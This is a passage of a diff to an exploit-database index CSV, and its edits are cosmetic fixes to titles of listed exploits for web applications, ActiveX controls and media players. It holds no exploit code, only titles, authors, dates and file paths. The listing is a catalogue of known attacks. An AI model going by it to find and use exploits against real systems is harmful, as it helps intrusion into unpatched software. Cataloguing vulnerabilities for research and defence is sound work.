-30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - login.asp Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0 +30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - 'login.asp' Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0 30403,platforms/php/webapps/30403.txt,"Wordpress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 - YDPCTL.dll ActiveX Control Buffer Overflow",2007-07-27,Unknown,windows,remote,0 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 @@ -27315,7 +27318,7 @@ id,file,description,date,author,platform,type,port 30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - Yonetici.asp SQL Injection",2007-07-28,Yollubunlar,asp,webapps,0 30425,platforms/asp/webapps/30425.txt,"Online Store Application Template - Sign_In.aspx SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30426,platforms/asp/webapps/30426.txt,"Message Board / Threaded Discussion Forum - Sign_In.aspx SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 -30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - login.asp SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 +30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog - SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 30430,platforms/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 @@ -27356,7 +27359,7 @@ id,file,description,date,author,platform,type,port 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 -30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp'Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 +30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - search.asp SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution",2013-12-24,Metasploit,unix,remote,5000 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution",2013-12-24,Metasploit,linux,remote,80 @@ -27422,7 +27425,7 @@ id,file,description,date,author,platform,type,port 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps,0 30532,platforms/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal",2007-08-27,titon,windows,remote,0 30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events - Viewevent.php SQL Injection",2007-08-27,s0cratex,php,webapps,0 -30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - login.php Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0 +30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0 30535,platforms/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning (1)",2007-08-27,"Amit Klein",linux,remote,0 30536,platforms/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",linux,remote,0 30537,platforms/windows/remote/30537.txt,"Microsoft MSN Messenger 8.0 - Video Conversation Buffer Overflow",2007-08-28,wushi,windows,remote,0 @@ -27462,8 +27465,8 @@ id,file,description,date,author,platform,type,port 30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 - bdelev.dll ActiveX Control Double Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 -30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - login.asp SQL Injection",2007-09-04,SmOk3,asp,webapps,0 -30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 - Heap-Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 +30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 +30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 30566,platforms/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",multiple,dos,0 30567,platforms/windows/remote/30567.html,"Microsoft Agent agentdpv.dll ActiveX Control - Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 @@ -27475,7 +27478,7 @@ id,file,description,date,author,platform,type,port 30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - forum_forum.php id Parameter Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - text_search_action.php search_string Parameter Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 -30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 +30577,platforms/php/webapps/30577.txt,"SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow",2007-09-12,"Code Audit Labs",linux,dos,0 30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 - Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",php,webapps,0 @@ -27577,7 +27580,7 @@ id,file,description,date,author,platform,type,port 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 -30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - login.php mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 +30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - default.asp mode2 Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30643,platforms/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,remote,0 30644,platforms/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,dos,0 @@ -27693,7 +27696,7 @@ id,file,description,date,author,platform,type,port 30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0 30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos,0 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0 -30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - login.php Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 +30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 - rss.php Cross-Site Scripting",2007-11-12,"Mesut Timur",php,webapps,0 30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,php,dos,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 @@ -27717,7 +27720,7 @@ id,file,description,date,author,platform,type,port 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine - .MDB File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 -30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - login.asp Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 +30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 @@ -27824,7 +27827,7 @@ id,file,description,date,author,platform,type,port 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 -30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack-Based Buffer Overflow",2007-12-21,"Luigi Auriemma",multiple,dos,0 +30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow",2007-12-21,"Luigi Auriemma",multiple,dos,0 30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0 30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - Games.php ID Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - forum/viewthread.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 @@ -27922,7 +27925,7 @@ id,file,description,date,author,platform,type,port 31037,platforms/php/webapps/31037.txt,"PHPAutoVideo 2.21 - sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"PHPAutoVideo 2.21 - 'index.php' cat Parameter Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps,0 31039,platforms/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0 -31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0 +31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0 31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 @@ -27969,7 +27972,7 @@ id,file,description,date,author,platform,type,port 31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting",2014-01-20,"Saeed reza Zamanian",php,webapps,80 31087,platforms/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Persistent Cross-Site Scripting",2014-01-20,"Rakesh S",hardware,webapps,80 31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80 -31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 +31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 Wordpress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 31093,platforms/php/webapps/31093.txt,"ITechClassifieds - viewcat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0 @@ -28045,9 +28048,9 @@ id,file,description,date,author,platform,type,port 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0 31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos,0 -31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 +31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0 -31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP'Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 +31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0 31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0 31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0 @@ -28290,7 +28293,7 @@ id,file,description,date,author,platform,type,port 31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0 31412,platforms/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0 -31414,platforms/php/webapps/31414.txt,"PHPstats 0.1_alpha - 'PHPstats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps,0 +31414,platforms/php/webapps/31414.txt,"phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps,0 31415,platforms/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0 31416,platforms/php/webapps/31416.txt,"webSPELL 4.1.2 - 'index.php' Cross-Site Scripting",2008-03-18,n3w7u,php,webapps,0 31418,platforms/php/webapps/31418.txt,"Job Site 1.0 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 @@ -28387,13 +28390,13 @@ id,file,description,date,author,platform,type,port 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 -31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui'SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 +31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-03-25,U238,php,webapps,0 31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 -31534,platforms/windows/remote/31534.html,"LeadTools Multimedia 15 - 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 -31535,platforms/php/webapps/31535.txt,"PHPBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0 +31534,platforms/windows/remote/31534.html,"LeadTools Multimedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0 +31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0 31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote,0 31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 - webapps/blackboard/execute/viewCatalog searchText Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 @@ -28491,7 +28494,7 @@ id,file,description,date,author,platform,type,port 31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 -31633,platforms/php/webapps/31633.html,"PHPBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 +31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0 31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service",2008-04-10,ryujin,windows,dos,0 31636,platforms/php/webapps/31636.txt,"W2B PHPHotResources - 'cat.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps,0 @@ -28521,7 +28524,7 @@ id,file,description,date,author,platform,type,port 31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 - contacts.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 - groupes.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - login.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0 31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0 @@ -28720,7 +28723,7 @@ id,file,description,date,author,platform,type,port 31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,asp,webapps,0 31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component - 'forum' Parameter SQL Injection",2008-06-02,His0k4,php,webapps,0 31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection",2008-06-02,"Ugurcan Engyn",asp,webapps,0 -31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM'Stack-Based Buffer Overflow",2008-06-04,"Alfredo Ortega",multiple,dos,0 +31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",multiple,dos,0 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",windows,remote,0 31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80 31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0 @@ -28820,7 +28823,7 @@ id,file,description,date,author,platform,type,port 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 32048,platforms/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter'SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id parameter' SQL Injection",2014-02-28,HauntIT,php,webapps,80 31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow (SEH)",2014-02-28,metacom,windows,local,0 32094,platforms/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 @@ -28840,7 +28843,7 @@ id,file,description,date,author,platform,type,port 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy parameter) SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 -31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue'Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0 +31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Stack Buffer Overflow",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting",2014-03-01,Portcullis,windows,webapps,8080 @@ -28854,7 +28857,7 @@ id,file,description,date,author,platform,type,port 32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 - admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0 32004,platforms/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 -32005,platforms/php/webapps/32005.txt,"FaName 1.0 - page.php name Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 +32005,platforms/php/webapps/32005.txt,"FaName 1.0 - 'page.php' name Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service",2008-06-30,"Noam Rathus",multiple,dos,0 32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0 @@ -28871,7 +28874,7 @@ id,file,description,date,author,platform,type,port 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - 'index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 -32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - login.php Multiple Parameter Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 +32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Parameter Cross-Site 